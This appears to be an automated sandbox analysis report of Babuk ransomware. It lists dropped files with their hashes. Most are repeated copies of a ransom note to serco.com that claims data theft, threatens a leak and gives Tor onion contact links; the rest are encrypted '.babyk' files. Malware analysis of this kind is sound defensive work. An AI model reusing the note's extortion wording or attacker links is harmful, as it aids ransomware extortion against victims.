                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):248
                                                                            Entropy (8bit):7.083251362824344
                                                                            Encrypted:false
                                                                            SSDEEP:6:QvDOFaQwV6D1ZejYF+fr1/istan+cJfQgu+i0vtn:QrqLtmji2/iaapfQgui
                                                                            MD5:04A80AFBFA2906246E0F657477431B15
                                                                            SHA1:520BFA7DD84325A85321A99DE07E44D2EA172B8E
                                                                            SHA-256:A1857180B5EBC1AA173A00884EC4E096D397795A93AC5C49488305CF8A000713
                                                                            SHA-512:289EFED9CEDA8A4E76CD0ECA10636EC04D35A1D131FFE9A5B8D3B2A82C99CE7606A0DC7F2C56507159F10E86EF672BBB04D16047A92B4ADCD85E1048870B9DAC
                                                                            Malicious:false
                                                                            Preview: ..}CaC....N....~p..."FY...k....H....k ?.......}r+.|...l..6..HY<..2...{7.C..8....[y;...:.....T..........+.%......IQ<.V......E..}...4..f..T..!.Z.&.G.V5.\...b.uyI....0.!+9...nT...e.....`l3..XY..m.S(r@..{....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows\History\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):171
                                                                            Entropy (8bit):6.466710977376572
                                                                            Encrypted:false
                                                                            SSDEEP:3:/WPPBGB95f2A1ECHXswXxP5kwgOzN5ybl/+upl/aLUxNvEEn:OXTA68RBP5Vw9Tp0L0vtn
                                                                            MD5:8751411F3A5FC2D265D811F04CC28E33
                                                                            SHA1:313645C92E0430D6BF07886EE042140EE89EE1DB
                                                                            SHA-256:DBCDD8BA0A0C7D5907E635C108BB939BC4B6DA6FF0A6ED44ED3C58F16C8FEB02
                                                                            SHA-512:2F36463E38616B440A5CDD041D44CCC68B490D18047B7995597C9B2BD291CB804F778E485615BFAD76225168ED136A7FABD06A8273120E8488FE73B353027747
                                                                            Malicious:false
                                                                            Preview: .......0..S...h(.dm..3.g.rh.|.h;.q|.<.LLF..<.B.BM.+...bTt.\.r.g...V.8|.o.>..P{..x.`...@sx.d....h...+..>.M.Z....(..v:O,.M....0.r....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):175
                                                                            Entropy (8bit):6.678876737569054
                                                                            Encrypted:false
                                                                            SSDEEP:3:VT6ta1v0MW4+sRo8ZBosdaInY6kz+QUuIws6upWPKTGm184Rs3XWll/G9UxNvEEn:VeM1v/1hT7da7NfTIws6upWPIGC84Rsw
                                                                            MD5:40C318AFBF3A0C4E5EE7A0D23C66E923
                                                                            SHA1:29A19957B184D5DF1862041BDC1CB96D0A746D2B
                                                                            SHA-256:C80054B6638E1FEAA8E180CE3001876103D68EFC856DFB7EDCD8318D945A04A6
                                                                            SHA-512:5142D8A91F2CC43784194115E7E31751AC3BAEBA4D4548D292BF267DD05D8219869EBFBB911FFB35399D3BC8D708C42909B8EF595ADA122CE87B340A8097EA73
                                                                            Malicious:false
                                                                            Preview: .3.y..>....y..!...YNN..ph;.Eb....,v-.....'..H0cxCP?......_X7.z........Y1.@.......{..O.k.S..r.s.X.B/6#..*...B.0..D..q$..T..i..,y.p.~.....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1280
                                                                            Entropy (8bit):7.83946483066541
                                                                            Encrypted:false
                                                                            SSDEEP:24:0DFxdOILSgKoV37ireS9fK36P51vb5n/qZk6Ket9PpZYqbRJ8:0DPdygKuqdK3m7vb5n/s5nbPpZjL8
                                                                            MD5:4F911E4C9756E7E0C8BCB776A6530BEF
                                                                            SHA1:541DC8B545624329A7B2A923FB887C3857789C94
                                                                            SHA-256:E94BD69F804761CA868EB10212E4C391F32EC58A158A24DF2ACD2CF1D80F7812
                                                                            SHA-512:5C933BCCC7E9C11A6E469C7643F22A3D75D77E3F6F0A5B1FB59FEAFC8890619474917A46C1B214BB76C87DE635E4F594E383199FBEC3B90AFA469431208E8DBB
                                                                            Malicious:false
                                                                            Preview: ......N.s.....9...'.W..!.cyX."..*.JEK...z.=.%2.....H..G~....{A.&..dp..u.../...f..#.YE!..|....6...'M.X..HZ7......4+q.9,`...m]%/T*K..%2k..d..V...0......&.}.xm...!.c?..........:5}(......2...:.....q.........`..Z.5...3.......M..X!dA.;....aF.f.q....o5."\_.n1.....c.qT./.$WC..'.Z..1L..XG.f.<c...uk.OT.c....u...Y....H.)].-3..N.2.e.X...Ug.g..,i..2.5.?....%.+x=.,.....a.W.p.....~...._.p.?...jlY.o.'......o...Tm..Z q..0..V>u...0w:\......re....C...jd.....(S|@,.AT.....q....=.z....#..GF..(..........u...../UUX....3.+..V...d.hJ.6.....%...O...YOL}.{.Ru.s...>........ngc.4..G.....F3.J8.!vDx.....:{..|...."%....O@w.....X......i.."=.PE.U.|.."..P..+.....C..[..x?........e........8.Y_.......j.....*..Z.T.^.*D!4.I.K...z........4.-.....y.....]..t..o}...Z..a..\.}`.r..4._..).*.!"..>..?......*..t..c}..J.....V.O..}Mn3.w..o...C.r-....~..5z..../P.......s&.-.........vJM...V..H...t.+l..i.=....1F3f.W~\.u.h.(..P..4..M.Z...@+..J...r..G."..l..X~...`.|Oy.x._.X.........+...
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
